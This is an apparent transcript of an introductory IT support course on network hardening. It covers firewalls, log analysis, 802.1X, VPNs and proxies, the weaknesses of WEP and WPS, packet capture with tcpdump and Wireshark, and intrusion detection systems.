spread, worms can live on their own and spread through channels like the network
X.509 standard: It is what defines the format of digital certificates, as well as a certificate revocation list or
CRL
Z
0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer or vendor, but
is known to
Congrats on getting this far.

You're over halfway through the course
and so close to completing the program.
In this section, we'll cover
ways for you to harden your networks.
Network hardening is the process
of securing a network by reducing
its potential vulnerabilities through
configuration changes and taking specific steps.
In the next few lessons,
we'll do a deep dive on the best practices that
an IT support specialist should
know for implementing network hardening.
We'll also discuss network security protection
along with network monitoring and analysis.
There's a general security principle that can
be applied to most areas of security.
It's the concept of disabling
unnecessary extra services or restricting access to them.
Since any service that's enabled and accessible can be
attacked this principle should
be applied to network security too.
Networks would be much safer if you disable access to
network services that aren't
needed and enforce access restrictions.
Implicit deny is a network security concept where
anything not explicitly permitted
or allowed should be denied.
This is different from blocking all traffic,
since an Implicit deny configuration will
still let traffic pass that you've defined as allowed.
You can do this through ACO configurations.
This can usually be configured on a firewall,
which makes it easier to build secure firewall rules.
Instead of requiring you to
specifically block all traffic you don't want,
you can just create rules
for traffic that you need to go through.
You can think of this as whitelisting
as opposed to blacklisting.
Well, this is slightly less convenient,
it's a much more secure configuration.
Before a new service will work,
a new rule must be defined for it,
reducing convenience a bit.
Another very important component of network security
is monitoring and analyzing traffic on your network.
You learned about monitoring in
a previous course of this program.
But we'll refer to monitoring in
the context of network analysis here.
There are a couple of reasons why
monitoring your network is so important.
The first is that it lets you establish
a baseline of what
your typical network traffic looks like.
This is key because in order to know what
unusual or potential attack traffic looks like,
you need to know what normal traffic looks like.
You can do this through
network traffic monitoring and logs analysis.
We'll dive deeper into
what network traffic monitoring is a bit later.
But let's quickly summarize how
logs can be helpful in this context.
Analyzing logs is the practice of collecting logs
from different network and
sometimes client devices on your network,
then performing an automated analysis on them.
This will highlight potential intrusions,
signs of malware infections,
or a typical behavior.
You'd want to analyze things like firewall logs,
authentication server logs, and application logs.
As an IT support specialist,
you should pay close attention to
any external facing devices or services.
They're subject to a lot
more potentially malicious traffic,
which increases the risk of compromise.
Analysis of logs would involve looking
for a specific log messages of interests,
like with firewall logs.
Attempted connections to an internal service from
an untrusted source address may be worth investigating.
Connections from the internal network
to known address ranges of
botnet command and control servers
could mean there's a compromised machine on the network.
As you learned in earlier courses of this program,
log and analysis systems are a best practice
for IT support specialist to utilize and implement.
This is true too, for network hardening.
Logs analysis systems are configured using
user-defined rules to match
interesting or a typical log entries.
These can then be surfaced through an alerting system
to let security engineers investigate the alert.
Part of this alerting process would also involve
categorizing the alert based on the rule matched.
You'd also need to assign a priority to facilitate
this investigation and to
permit better searching or filtering.
Alerts can take the form of sending an email or
an SMS with information
and a link to the event that was detected.
You could even wake someone up in the middle of
the night if the event was severe enough.
Normalizing log data is an important step since logs
from different devices and systems
may not be formatted in a common way.
You might need to convert log components
into a common format to make
analysis easier for analysts
and rule-based detection systems.
This also makes correlation analysis easier.
Correlation analysis is the process of taking log data
from different systems and
matching events across the systems.
If we see a suspicious connection coming from
a suspect source address and the firewall logs to
our authentication server we might want to correlate that
logged connection with the log data
of the authentication server.
That would show us any authentication attempts
made by the suspicious client.
This type of logs analysis is
also super important in investigating
and recreating the events that
happened once a compromise is detected.
This is usually called a post fail analysis,
since it's investigating how
a compromise happened after the breach is detected.
Detailed logging and analysis of logs would allow for
detailed reconstruction of the events
that led to the compromise.
Hopefully, this would let the security team make
appropriate changes to security systems
to prevent further attacks.
It could also help determine
the extent and severity of the compromise.
Detailed logging would also be able to show if
further systems were compromised
after the initial breach.
It would also tell us whether or not any data
was stolen and if it was what that data was.
One popular and powerful logs analysis system is splunk,
a very flexible and extensible log aggregation
and search system.
Splunk can grab logs data from
a wide variety of systems
and in large amounts of formats.
It can also be configured to generate alerts and allows
for powerful visualization of activity based on log data.
Flood guards provide protection
against DoS or Denial of Service Attacks.
Think back to the CIA triad we covered earlier.
Availability is an important tenant of security and is
exactly what flood guard protections
are designed to help ensure.
This works by identifying
common flood attack types like SYN floods or UDP floods.
It then triggers alerts once
a configurable threshold of traffic is reached.
There's another threshold
called the activation threshold.
When this one is reached,
it triggers a pre-configured action.
This will typically block
the identified attack traffic
for a specific amount of time.
This is usually a feature on
enterprise-grade routers or firewalls
though it's a general security concept.
A common open-source flood guard protection tool
is fail to ban.
It watches for signs of an attack on a system and
blocks further attempts from a suspected attack address.
Fail to ban is
a popular tool for smaller-scale organizations.
If you're the sole IT support specialist
in your company or
have a small fleet of machines
this can be a helpful tool to use.
This flood guard protection can also be
described as a form of intrusion prevention system.
Network separation or network segmentation is
a good security principle for
an IT support specialist to implement.
It permits more flexible management of
the network and provides some security benefits.
This is the concept of using V lens to create
virtual networks for different device classes or types.
Think of it as creating
dedicated virtual networks for your employees to use,
but also having separate networks
for your printers to connect to.
The idea here is that the printers won't need
access to the same network resources than employees do.
It probably doesn't make sense to have
the printers on the employee network.
You might be wondering how employees are supposed
to print if the printers are on a different network.
It's actually one of the benefits of
network separation since we can
control and monitor the flow of
traffic between networks more easily.
To give employees access to printers,
we'd configure routing between
the two networks on our routers.
We'd also implement network ackles
that permit the appropriate traffic.
Supplemental Reading for Network Hardening

Best Practices
For more information on this Video Lecture check out the following links:
Cisco IOS firewall rules
Juniper firewall rules
Iptables firewall rules
UFW firewall rules
Configuring Mac OS X firewall
Microsoft firewall rules
Supplemental Reading on IEEE 802.1X

IEEE 802.1X
When clients are trying to communicate on a local network, the devices must have a standard method of
communication and authentication. The Institute of Electrical and Electronics Engineers (IEEE) created a
standard called IEEE 802.1X. This standard specifies a common architecture, functional elements, and
protocols that support authentication between the clients of ports attached to the same Local Area
Network (LAN). This reading will cover what 802.1X is, basic components of authentication and how it
works, and different kinds of authentication available for use under the standard.
IEEE 802.1X Protocol

IEEE 802 networks are deployed in locations that provide access to critical data, support mission critical
applications, or charge for service. Port-based network access control regulates access to the network,
guarding against attacks by unauthorized parties, network disruption, and data loss.
Authentication
The three main components in the authentication process are:
 Supplicant is the client making the request to access the LAN or wireless access point.
 Authenticator takes the packet from the supplicator and sends it to the authentication server until
the session is authenticated. Any other information sent before authentication occurs is dropped.
 Authentication server provides a database of information required for authentication, and
informs the authenticator to deny or permit access to the supplicant.
Authentication occurs when a client first connects to a network. The client sends a packet of information
and the authenticator sends the packet to the authentication server. In some instances, the authenticator
and authentication server may be integrated into a single point. The authentication server then verifies the
identity or key against the information in its database. If the credentials are valid, the authentication
succeeds. Then the server begins processing the connection request. If the credentials are not valid, the
authentication fails. The authentication server sends an Access Reject message and the connection request
is denied.
Authentication methods
When the request is sent to the authentication server there are a couple of methods for authentication.
IEEE defines two different link-level authentication methods:
 Shared key system is a shared key or passphrase that is manually set on both the mobile device
and the AP/router.
 Open system is when the authentication server has a list of authorized clients to check against
when a client requests access. This list is usually in the form of MAC addresses but it varies by
network.
Shared Key authentication methods
There are several shared key authentication methods that are commonly used:
 Wired Equivalent Privacy (WEP) is not recommended for a secure WLAN. The main security risk
is hackers capturing the encrypted form of an authentication response frame, using widely
available software applications, and using the information to crack WEP encryption.
 Wi-Fi Protected Access (WPA) complies with the wireless security standard and strongly
increases the level of data protection and access control (authentication) for a wireless network.
WPA enforces IEEE 802.1X authentication and key-exchange and only works with dynamic
encryption keys.
 Wi-Fi Protected Access 2 (WPA2) is a security enhancement to WPA. Users must ensure the
mobile device and AP/router are configured using the same WPA version and pre-shared key (PSK).
 Association allows the access point or router to record each mobile device so that data is properly
delivered. This occurs after authentication is complete.
These authentication methods are standardized under the IEEE 802.1X protocol.
Key takeaways
IEEE 802.1x is a protocol developed to let clients connect to port based networks using modern
authentication methods.
 There are three nodes in the authentication process: supplicant, authenticator, and authentication
server.
 The authentication server uses either a shared key system or open access system to control who is
able to connect to the network.
 Based on the criteria of the authentication server the supplicator will grant the authentication
request and begin the connection process or it will be sent an Access Reject message and
terminate the connection.
Hey, welcome back.

In the last lesson, we covered Network,
Hardware hardening security measures,
which you should be aware of as an IT support specialist.
Now, we're going to shift to
Network Software hardening techniques.
Just like with network hardware hardening,
it's important for you to know how to
implement network software hardening,
which includes things like firewalls, proxies, and VPNs.
These security software solutions will play
an important role in securing
networks and their traffic for your organization,
like we mentioned before,
firewalls are critical to securing a network.
They can be deployed as
dedicated network infrastructure devices
which regulate the flow of traffic for a whole network.
They can also be host-based as software that runs on
a client system providing
protection for that one host only.
It's generally recommended to deploy both solutions.
A host-based firewall provides
protection for mobile devices,
such as a laptop that could be used in an untrusted,
potentially malicious environment,
like an airport Wi-Fi hotspot.
Host-based firewalls are also useful for protecting
other hosts from being compromised by
corrupt device on the internal network.
That's something a network-based firewall
may not be able to help defend against.
You will almost definitely encounter host-based firewalls
since all major operating systems
have built-in ones today.
It's also very likely that your company
will have some kind of network-based firewall.
Your router at home even has
a network-based firewall built-in.
VPNs are also recommended to provide
secure access to internal resources
for mobile or roaming users.
We won't go back over all the details,
but here's a quick rundown.
VPNs are commonly used to provide
secure remote access and link two networks securely.
Let's say we have two offices,
located in buildings that are on opposite sides of town.
We want to create one unified network
that would let users in
each location seamlessly connect to
devices and services in either location.
We could use a site-to-site VPN to link
these two offices to the people in the offices,
everything would just work.
They'd be able to connect to a service hosted in
the other office without any specific configuration.
Using a VPN tunnel,
all traffic between the two offices
can be secured using encryption.
This lets the two remote networks
join each other seamlessly.
This way, clients on
one network can access devices on the
other without requiring them to
individually connect to a VPN service.
Usually, the same infrastructure can be used to allow
remote access VPN services for individual clients
that require access to
internal resources while out of the office.
Proxies can be really useful to
protect client devices and their traffic.
They also provide secure
remote access without using a VPN.
A standard web proxy can be
configured for client devices.
This allows web traffic to be proxy through
a proxy server that we control for lots of purposes.
This configuration can be used for
logging web requests of client devices.
The devices can be used for logs and
traffic analysis and forensic investigation.
The proxy server can be configured to
block content that might be malicious,
dangerous, or just against company policy.
A reverse proxy can be configured to allow secure
remote access to web-based services
without requiring a VPN.
Now, as an IT support specialist,
you may need to configure or maintain
a reverse proxy service as an alternative to VPN.
By configuring a reverse proxy
at the edge of your network,
connection requests to services inside the network coming
from outside are intercepted by the reverse proxy.
They are then forwarded onto
the internal service with
the reverse proxy acting as a relay.
These bridges communications between
the remote client outside
the network and the internal service.
This proxy setup can be secured even more
by requiring the use of client TLS certificates,
along with username and password authentication.
Specific ACLs can also be configured on
the reverse proxy to restrict access even more.
Lots of popular proxy solutions support
a reverse proxy configuration like HAProxy,
Nginx, and even the Apache web server.
Supplementary reading on HAProxy, nginx and

Apache HTTP server
We've included the main documentation for each product we mention, as well as a direct link the the
documentation that covers reverse proxying specifically.
HAProxy main documentation
HAProxy reverse proxy documentation
nginx main documentation
nginx reverse proxy documentation
Apache HTTP server main documentation
Apache HTTP server reverse proxy documentation
In this lesson, we'll cover

the best practices for implementing wireless security.
you'll be responsible for
Wi-Fi configuration and infrastructure.
Understanding the security options
available for wireless networks is
super important to making
sure that the best solution is chosen.
We already covered the nuts and
bolts of the wireless 802.11
protocol and explained how
wireless networks work. We won't rehash that.
But we'll take a closer look at
the security implementations available
to protect wireless networks.
Before we jump into the nitty-gritty details
of wireless security,
take a second and ask yourself this question.
What do you think the best security option
is for securing a Wi-Fi network?
It's okay if you're not sure.
Just keep this question in mind as we go over
all the options available
along with their benefits and drawbacks.
Spoiler alert, there's
some pretty technical security stuff coming your way.
So put your thinking caps on.
The first security protocol
introduced for Wi-Fi networks was WEP,
or Wired Equivalent Privacy.
It was part of the original
802.11 standard introduced back in 1997.
WEP was intended to provide
privacy on par with a wired network.
That means the information passed over
the network should be
protected from third parties eavesdropping.
This was an important consideration
when designing the wireless specification.
Unlike wire networks,
packets could be intercepted by anyone with
physical proximity to the access point or client station.
Without some form of encryption to protect the packets,
wireless traffic would be readable
by anyone nearby who wants to listen.
WEP was proven to be seriously bad at providing
confidentiality or security for wireless networks.
It was quickly discounted in
2004 in favor of more secure systems.
Even so, we'll cover it here for historical purposes.
I want to drive home the point that
no one should be using WEP anymore.
You never know. You may see
seriously outdated systems when
working as an IT support specialist.
It's important that you fully understand why
WEP is outdated and what you can do instead.
WEP use the RC4 symmetric stream cipher for encryption.
It used either a 40-bit or 104-bit shared key,
where the encryption key for
individual packets was derived.
The actual encryption key for
each packet was computed by taking the
user-supplied shared key and then
joining a 24-bit initialization vector,
or IV for short.
It's a randomized bit of data to avoid
reusing the same encryption key between packets.
Since these bits of data are concatenated or joined,
a 40-bit shared key scheme uses
a 64-bit key for encryption,
and the 104-bit scheme uses 128-bit key.
Originally, WEP encryption was limited to 64-bit only
because of US export restrictions
placed on encryption technologies.
Now, once those laws were changed,
128-bit encryption became available for use.
The shared key was entered as
either 10 hexadecimal characters for
40-bit WEP or 26 hex characters for 104-bit WEP.
Each hex character was four bits each.
The key could also be specified
by supplying five ASCII characters,
or 13, each ASCII character representing eight bits.
But this actually reduces the available keyspace to
only valid ASCII characters
instead of all possible hex values.
Since this is a component of the actual key,
the shared key must be exactly as
many characters as appropriate for the encryption scheme.
WEP authentication originally supported
two different modes;
open system authentication and shared key authentication.
The open system mode didn't
require clients to supply credentials.
Instead, they were allowed to
authenticate and associate with the access point.
But the access point would
begin communicating with the client
encrypting data frames with the pre-shared WEP key.
If the client didn't have
the key or had an incorrect key,
it wouldn't be able to decrypt the frames
coming from the access point or AP.
It also wouldn't be able to communicate back to the AP.
Shared key authentication worked by requiring clients to
authenticate through a four-step
challenge response process.
This basically has the AP asking
the client to prove that they have the correct key.
Here's how it works. The client
sends an authentication request to the AP.
The AP replies with a clear text challenge a bit of
randomized data that the client is
supposed to encrypt using the shared WEP key.
The client replies to the AP with
the resulting ciphertexts from
encrypting this challenge text.
The AP verifies this by decrypting the response and
checking it against the plain text challenge text.
If they match, a positive response is sent back.
Does anything jump out at us
potentially insecure in the scheme?
We're transmitting both the plaintext
and the ciphertext in
a way that exposes both of
these messages to potential eavesdroppers.
This opens the possibility for
the encryption key to be recovered by the attacker.
A general concept in security and encryption is
to never send the plaintext and cipher text together,
so that attackers can't work
out the key used for encryption.
But WEP's true weakness wasn't
related to the authentication schemes.
Its use of the RC4 stream cipher and how the IVs were
used to generate encryption keys
led to WEP's ultimate downfall.
The primary purpose of an IV is to introduce
more random elements into
the encryption key to avoid reusing the same one.
When using a stream cipher like RC4,
it's super important than
an encryption key doesn't get reused.
This would allow an attacker to compare two messages
encrypted using the same key and recover information.
But the encryption key in
WEP is just made up of the shared key,
which doesn't change frequently.
It had 24 bits of randomized data,
including the IV tacked onto the end of it.
This results in only a 24-bit pool
where unique encryption keys will be pulled from unused.
Since the IV is made up of 24 bits of data,
then total number of possible values is
not very big by modern computing standards.
That's only about 17 million possible unique IVs,
which means after roughly 5,000 packets,
an IV will be reused.
When an IV is reused,
the encryption key is also reused.
It's also important to call out that
the IV is transmitted in plain text.
If it were encrypted,
the receiver would not be able to decrypt it.
This means an attacker just has to keep track
of IVs and watch for repeated ones.
The actual attack that lets an attacker
recover the WEP key relies on weaknesses in
some IVs and how the RC4 cipher
generates a key-stream used
for encrypting the data payloads.
This lets the attacker reconstruct
this key-stream using packets
encrypted using the weak IVs.
The details of the attack are
outside what we'll cover in this course.
You can also take a look at
open source tools that demonstrate this attack in action,
like Aircrack-ng or AirSnort.
They can recover a WEP key in a matter of minutes.
It's terrifying to think about.
You might be asking yourself why it's important to know
WEP since it's not recommended for use anymore.
Well, as an IT support specialist,
you might encounter some cases where
legacy hardware is still running WEP.
It's important to understand
the security implications of
using this broken security protocol,
so you can prioritize upgrading away from web.
Supplementary reading for WEP Encryption

and Why You Shouldn't Use It
Fluhrer S., Mantin I., Shamir A. (2001) Weaknesses in the Key Scheduling Algorithm of RC4. In: Vaudenay S.,
Youssef A.M. (eds) Selected Areas in Cryptography. SAC 2001. Lecture Notes in Computer Science, vol 2259.
Springer, Berlin, Heidelberg https://doi.org/10.1007/3-540-45537-X_1
The replacement for web from the Wi-Fi Alliance was

WPA or Wi-Fi Protected Access.
WPA was designed as
a short-term replacement that would be
compatible with older WEP-enabled hardware
with a simple firmware update.
This helped with user adoption because it
didn't require the purchase of new Wi-Fi hardware.
To address the shortcomings of WEP security,
a new security protocol was introduced called
TKIP or the Temporal Key Integrity Protocol.
TKIP implemented three new features
that made it more secure than WEP.
First, a more secure key derivation method
was used to more
securely incorporate the IV
into the per packet encryption key.
Second, a sequence counter was implemented to
prevent replay attacks by rejecting out-of-order packets.
Third, a 64-bit MIC or
message integrity check was
introduced to prevent forging,
tampering, or corruption of packets.
TKIP still use the RC4 cipher
as the underlying encryption algorithm,
but it addressed the key generation weaknesses
of web by using
a key mixing function to
generate unique encryption keys per packet.
It also utilizes 256-bit long keys.
This key mixing function incorporates
the long-lived Wi-Fi passphrase with the IV.
This is different compared to
the simplistic concatenation of the shared key and IV.
Under WPA, the pre-shared key is
the Wi-Fi password you share with people when
they come over and want to use your wireless network.
This is not directly used to encrypt traffic.
It's used as a factor to derive the encryption key.
The passphrase is fed into the PBKDF2 or
Password-Based Key Derivation Function
2 along with the Wi-Fi network's SSID as a salt.
This is then run through the HMAC-SHA1 function
4,096 times to generate a unique encryption key.
The SSID salt is incorporated
to help defend against rainbow table attacks.
The 4,096 rounds of HMAC-SHA1
increase the computational power
required for a brute force attack.
I should call out that the pre-shared key
can be entered using two different methods.
A 64-character hexadecimal value can be
entered or the 64-character value is used as the key,
which is 64 hexadecimal characters times 4 bits,
which is 256 bits.
The other option is to use PBKDF2 function,
but only if entering ASCII characters as a passphrase.
If that's the case, the passphrase can be
anywhere 8-63 characters long.
You might encounter WPS in
a small IT shop that uses commercial SOHO routers.
It can be useful in these smaller
environments to make it easier
to join wireless clients
to the wireless network securely,
but there are security implications
to having enabled that you should be aware of.
The Wi-Fi Alliance introduced WPS in 2006.
It provides several different methods that
allow our wireless client to securely
join a wireless network without
having to directly enter the pre-shared key.
This facilitates the use of
very long and secure passphrases
without making it unnecessarily complicated.
WPS simplifies this by allowing for
secure exchange of the SSID and pre-shared key.
This is done after authenticating or exchanging
data using one of the four supported methods.
WPS supports PIN entry authentication,
NFC or USB for
out-of-band exchange of the network details,
or push button authentication.
You've probably seen the push button mechanism.
It's typically a small button somewhere on
the home router with
two arrows pointing counterclockwise.
The push button mechanism
works by requiring a button to be
pressed on both the AP side and the client side.
This requires physical proximity and a short window of
time that the client can
authenticate with a button press of its own.
The NFC and USB methods just provide
a different channel to transmit
the details to join the network.
The PIN methods are really interesting
and also where critical flow was introduced.
The PIN authentication mechanism supports two modes.
In one mode, the client generates a pin,
which is then entered into the AP.
In the other mode, the AP has
a pin typically hard-coded into the firmware,
which is entered into the client.
It's the second mode that is vulnerable
to an online brute force attack.
The PIN authentication method
uses pins that are eight digits long,
but the last digit is a checksum
that's computed from the first seven digits.
This makes the total number of
possible pins 10^7 or around 10 million possibilities.
But the pin is authenticated by the AP in halves.
This means the client will send
the first four digits of the AP,
wait for a positive or negative response,
and then send the second half of
the pin if the first half was correct.
Did you see anything wrong with this scenario?
We're actually reducing
the total possible valid pins even
more and making it even
easier to guess what the correct pin is.
The first half of the pin,
being four digits, has about 10,000 possibilities.
The second half, only three
digits because of the checksum value,
has a maximum of only 1,000 possibilities.
This means the correct pin can be
guessed in a maximum of 11,000 tries.
It sounds like a lot, but it really isn't.
Without any rate limiting,
an attacker could recover the pin and
the pre-shared key in less than four hours.
In response to this,
the Wi-Fi Alliance revise
the requirements for the WPS specification,
introducing a lockout period of
one minute after three incorrect pin attempts.
This increases the maximum time to guess
the pin from four hours to less than three days.
That's easily in the realm of
possibility for determined and patient attacker,
but it gets worse.
If your network is compromised
using this attack because the pin
is an unchanging element that's
part of the AP configuration,
the attacker could just reuse
the already recovered WPS pin to get the new password.
This would happen even if you detected
unauthorized wireless clients on
your network and changed your Wi-Fi password.
Supplementary reading on WiFi Protected

Setup (WPS) PIN brute force vulnerability
WiFi Protected Setup (WPS) PIN brute force vulnerability
Now that we've covered the security options

available for protecting wireless networks,
what do you think the most secure option would be?
In an ideal world,
we'd all be protecting our wireless networks using
802.1X with EAP-TLS,
it offers arguably the best security available,
assuming proper and secure handling
of the PKI aspects of it.
But this option also
requires a ton of added complexity and overhead.
This is because it requires the use of
a radius server and
an additional authentication back-end at a minimum.
If EAP-TLS is implemented,
then all the public key infrastructure components
will also be necessary.
This adds even more complexity and management overhead.
Not only do you have to securely deploy
PKI on the back-end first certificate management,
but a system must be in place
to sign the client certificates.
You also have to distribute them to
each client that would be authenticating to the network.
This is usually more overhead
than many companies are willing to
take on because of the security
versus convenience trade-off involved.
If 802.1X is too complicated for a company,
the next best alternative would be
WPA2 with AES/CCMP mode.
But to protect against
brute force or rainbow table attacks,
we should take some steps to raise the computational bar.
A long and complex passphrase
that wouldn't be found in a dictionary would
increase the amount of time and
resources and attacker would
need to break the passphrase.
Changing the SSID to something uncommon and
unique would also make rainbow tables attack less likely.
It would require an attacker to
do the computations themselves,
increasing the time and
resources required to pull off an attack.
When using a long and complex Wi-Fi password,
you might be tempted to use
WPS to join clients to the network.
But we saw earlier that this might
not be a good idea from a security perspective.
In practice, you won't see WPS enabled in
an enterprise environment because
it's a consumer-oriented technology.
If your company values security over convenience,
you should make sure that WPS isn't enabled on your APs.
Makes sure this feature is disabled
on your APs management council.
You might want to also verify the feature is
actually disabled using a tool like Wash,
which scans and enumerates APs that have WPS enabled.
This independent verification is recommended,
sent some router manufacturers
don't allow you to disable it.
In some cases, disabling the feature through
the management console doesn't
actually disable the feature.
Now in order to monitor what type of traffic is on your network you need
a mechanism to capture packets from network traffic for analysis and
potential logging.
Packet sniffing or packet capture is the process of intercepting network packets in
their entirety for analysis.
It's an invaluable tool for IT support specialists to troubleshoot issues.
There are lots of tools that make this really easy to do.
Before we dive into the details of how to use them,
let's cover some basic concepts of packet sniffing.
By default network interfaces and the networking software stack on
an OS are going to behave like a well mannered interface.
It will only be accepting and processing packets that are addressed to its specific
interface address usually identified by a mac address.
If a packet with a different destination address is encountered the interface will
just drop the packet.
But if we wanted to capture all packets that an interface is able to see like
when we're monitoring all network traffic on a network segment,
this behavior would be a pain for us.
To override this we can place the interface into what's called
promiscuous mode.
This is a special mode for
ethernet network interfaces that basically says give me all the packets.
Instead of only accepting and handling packets destined for its address,
it will now accept and process any packet that it sees.
This is much more useful for network analysis or monitoring purposes.
I should also call out that admin or root privileges are needed
to place an interface into promiscuous mode and to begin to capture packets.
Many packet capture tools will handle this for you too.
Another super important thing to consider when you perform packet captures
is whether you have access to the traffic you like to capture and monitor.
Let's say you wanted to analyze all traffic between hosts
connected to a switch and your machine is also connected to a port on this switch.
What traffic would you be able to see in this case?
Tcpdump is
a super popular lightweight command line-based utility
that you can use to capture and analyze packets.
Tcpdump uses the open-source libpcap library.
That's a very popular packet capture library that's
used in a lot of packet capture and analysis tools.
Tcpdump also supports writing
packet captures to a file for later analysis,
sharing or replaying traffic.
It also supports reading
packet captures back from a file.
Tcpdump's default operating mode
is to provide a brief packet analysis.
It converts key information from layers
3 and up into human-readable formats.
Then it prints information about
each packet to standard
out or directly into your terminal.
It does things like converting the source
and destination IP addresses into
the dotted quad format we're most used to and
it shows the port numbers
being used by the communications.
Let's quickly walk through
the output of a sample Tcpdump.
The first bit of information is fairly straightforward.
It's a timestamp that represents when the packet on
this line was processed by the kernel in local time.
Next the Layer 3 protocol is identified.
In this case, it's IPV4.
After this, the connection quad is shown.
This is the source address,
source port, destination address, and destination port.
Next the TCP flags and
the TCP sequence number are
set on the packet, if there are any.
This is followed by the act number,
TCP window size, then TCP options if there are any set.
Finally, we have payload size in bytes.
Remember these from a few lessons
ago when we covered networking,
Tcpdump allows us to actually
inspect these values from packets directly.
I want to call out that Tcpdump by
default will attempt to
resolve host addresses to host names.
It will also replace port numbers with
commonly associated services that use these ports.
You can override this behavior with the dash n flag.
It's also possible to view
the actual raw data that makes up the packet.
This is represented as hexadecimal digits by using
the dash X flag or X if
you want the X in ascii interpretation of the data.
Remember that packets are just collections of
data or groupings of ones and zeros.
They represent information depending on the values
of this data and where they appear in the data stream.
Think back to packet headers
and how those are structured and formatted.
The view Tcpdump gives us,
let's see the data that fits into
the various fields that make up
the headers for layers and a packet.
Wireshark is another packet capture
and analysis tool that you can use.
But it's way more powerful when it comes to
application and packet analysis compared to Tcpdump.
It's a graphical utility that also uses
the libpcap library for
capture and interpretation of packets.
But it's way more extensible when it
comes to protocol and application analysis.
While Tcpdump can do basic analysis of
some types of traffic like DNS queries and answers,
Wireshark can do way more.
Wireshark can decode encrypted payloads
if the encryption key is known,
it can identify and extract data payloads from
file transfers through protocols like SMB or HTTP.
Wireshark's understanding of application level protocols
even extends to its filter strings.
This allows filter rules like finding
HTTP requests with specific strings in the URL,
which would look like
http.request.uri matches q=wireshark.
That filter string would
locate packets in our capture and that
contain a URL request
that has the specified string within it.
In this case, it would match
a query perimeter from a URL searching for Wireshark.
While this could be done using Tcpdump,
it's much easier using Wireshark.
Let's take a quick look at the Wireshark interface,
which is divided into thirds.
The list of packets are up top,
followed by the layered representation
of a selected packet from the list.
Lastly, the X and ascii
representation of the selected packet are at the bottom.
The packet list view is color-coded to
distinguish between different types
of traffic in the capture.
The color-coded is user configurable.
The defaults are green for TCP packets,
light blue for UDP traffic,
and dark blue for DNS traffic.
Black also highlights problematic TCP packets,
like out-of-order or repeated packets.
Above the packet list pane is
a display filter box which allows
complex filtration of packets to be shown.
This is different from capture filters which follows
the libpcap standard along with Tcpdump.
Wireshark's deep understanding of protocols allows
filtering by protocols along with their specific fields.
Sensor over 2,000 protocols supported by Wireshark.
We won't cover them in detail.
Not only does Wireshark have
very handy protocol handling and filtration,
it also understands and can
follow TCP stream or sessions.
This lets you quickly reassemble and
view both sides of the TCP session
so you can easily view
the full two-way exchange of information between parties.
Some other neat features of
Wireshark is its ability to decode
WPA and WEP encrypted wireless packets
if the passphrase is known.
It's also able to view
Bluetooth traffic with the right hardware,
along with USB traffic in other protocols like Zigbee.
It also supports file carving
or extracting data payloads from files
transferred over unencrypted protocols
like HTTP file transfers or FTP.
It's able to extract audio streams
from unencrypted VOIP traffic.
So basically, Wireshark is awesome.
You might be wondering how packet capture and
analysis fits into security at this point.
Like logs analysis,
traffic analysis is also
an important part of network security.
Traffic analysis is done using
packet captures and packet analysis.
Traffic on a network is basically a flow of packets.
Now being able to capture and
inspect those packets is important
to understanding what type of traffic is
flowing on our networks that we'd like to protect.
Supplemental Reading for Promiscuous Mode

Enabling promiscuous mode on Mac OS X
Enabling promiscuous mode on Windows
Intrusion detection and prevention systems or IDS/IPS.

IDS or IPS systems
operate by monitoring network traffic and analyzing it.
you may need to support
the underlying platform that the IDS/IPS runs on.
You might also need to maintain the system itself,
ensuring that rules are updated
and you may even need to respond to alerts.
What exactly do IDS and IPS systems do?
They look for matching behavior or
characteristics that would indicate malicious traffic.
The difference between an IDS and
an IPS system is that IDS is only a detection system.
It won't take action to block or
prevent an attack when one is detected,
it will only log and alert.
But an IPS system can adjust firewall rules on
the fly to block or drop
the malicious traffic when it's detected.
IPS and IDS systems can
either be host-based or network-based.
In the case of a network intrusion detection system
or NIDS,
the detection system would be
deployed somewhere on a network
where it can monitor traffic for
a network segment or subnet.
A host-based intrusion detection system
would be a software
deployed on a host that monitors
traffic to and from that host only.
It might also monitor
system files for unauthorized changes.
NID systems resemble firewalls in a lot of ways.
But a firewall is designed
to prevent intrusions by blocking
potentially malicious traffic coming from
outside and enforce Ackles between networks.
NID systems are meant to detect and alert on
potential malicious activity coming
from within the network.
Plus, firewalls only have
visibility of traffic flowing between networks.
They're set up to protect.
They generally wouldn't have visibility of
traffic between hosts inside the network.
The location of the NIDS must be
considered carefully When you deploy a system.
It needs to be located in
the network topology in a way that it
has access to the traffic we'd like to monitor.
A good way that you can get access
to network traffic is using
the port mirroring functionality
found in many enterprise switches.
This allows all packets on a port range or
entire villain to be mirrored to
another port where our needs hosts would be connected.
With this configuration,
our NIDS machine would be able to see
all packets flowing in
and out of hosts on the switch segment.
This lets us monitor host-to-host communications and
traffic from hosts to
external networks like the Internet.
The NIDS host would analyze this traffic by
enabling promiscuous mode on the analysis port.
This is the network interface that's
connected to the mirror port on a switch.
It can see all packets being
passed and perform analysis on the traffic.
Since this interface is used for receiving
mirrored packets from the network we'd like to monitor,
a NIDS host must have at least two network interfaces.
One is for monitoring and analysis and a separate one is
for connecting to our network for
management and administrative purposes.
Placement of a NIP system or
network intrusion prevention system,
would differ from a NID system.
This is because of a prevention system being able to
take action against a suspected malicious traffic.
In order for a NIPS device to block
or job traffic from a detected threat,
it must be placed in
line with the traffic being monitored.
This means that the traffic that's being
monitored must pass through the NIPS device.
If it wasn't the case,
the NIPS host wouldn't be able to take
action on suspected traffic.
Think of it this way.
A NIDS device is a passive observer that
only watches the traffic and
sends an alert if it sees something.
This is unlike a NIPS device,
which not only monitors traffic,
but can take action on the traffic it's monitoring
usually by blocking or dropping the traffic.
The detection of threats or malicious traffic is
usually handled through signature-based detection.
Similar to how antivirus software detects malware.
you might be in charge of maintaining
the IDS or IPS setup,
which would include ensuring that
rules and signatures are up-to-date.
Signatures are unique characteristics
of known malicious traffic.
They might be specific sequences
of packets or packets with
certain values encoded in the specific header field.
This allows intrusion detection and
prevention systems from easily
and quickly recognizing known bad traffic
from sources like botnets,
worms, and other common attack vectors on the internet.
But similar to antivirus,
less common or targeted attacks might
not be detected by a signature-based system,
since there might not be signatures
developed for these cases.
It's also possible to create
custom rules to match traffic that
might be considered suspicious
but not necessarily malicious.
This would allow investigators to look into
the traffic in more detail
to determine the badness level.
If the traffic is found to be malicious,
a signature can be developed from
the traffic and incorporated into the system.
What actually happens when
a NID system to detect something malicious?
This is configurable, but
usually the NID system would log
the detection event along with
a full packet capture of the malicious traffic.
An alert would also usually be triggered to
notify the investigating team
to look into the detected traffic.
Depending on the severity of the event,
the alert may just email group
or create a ticket to follow up on.
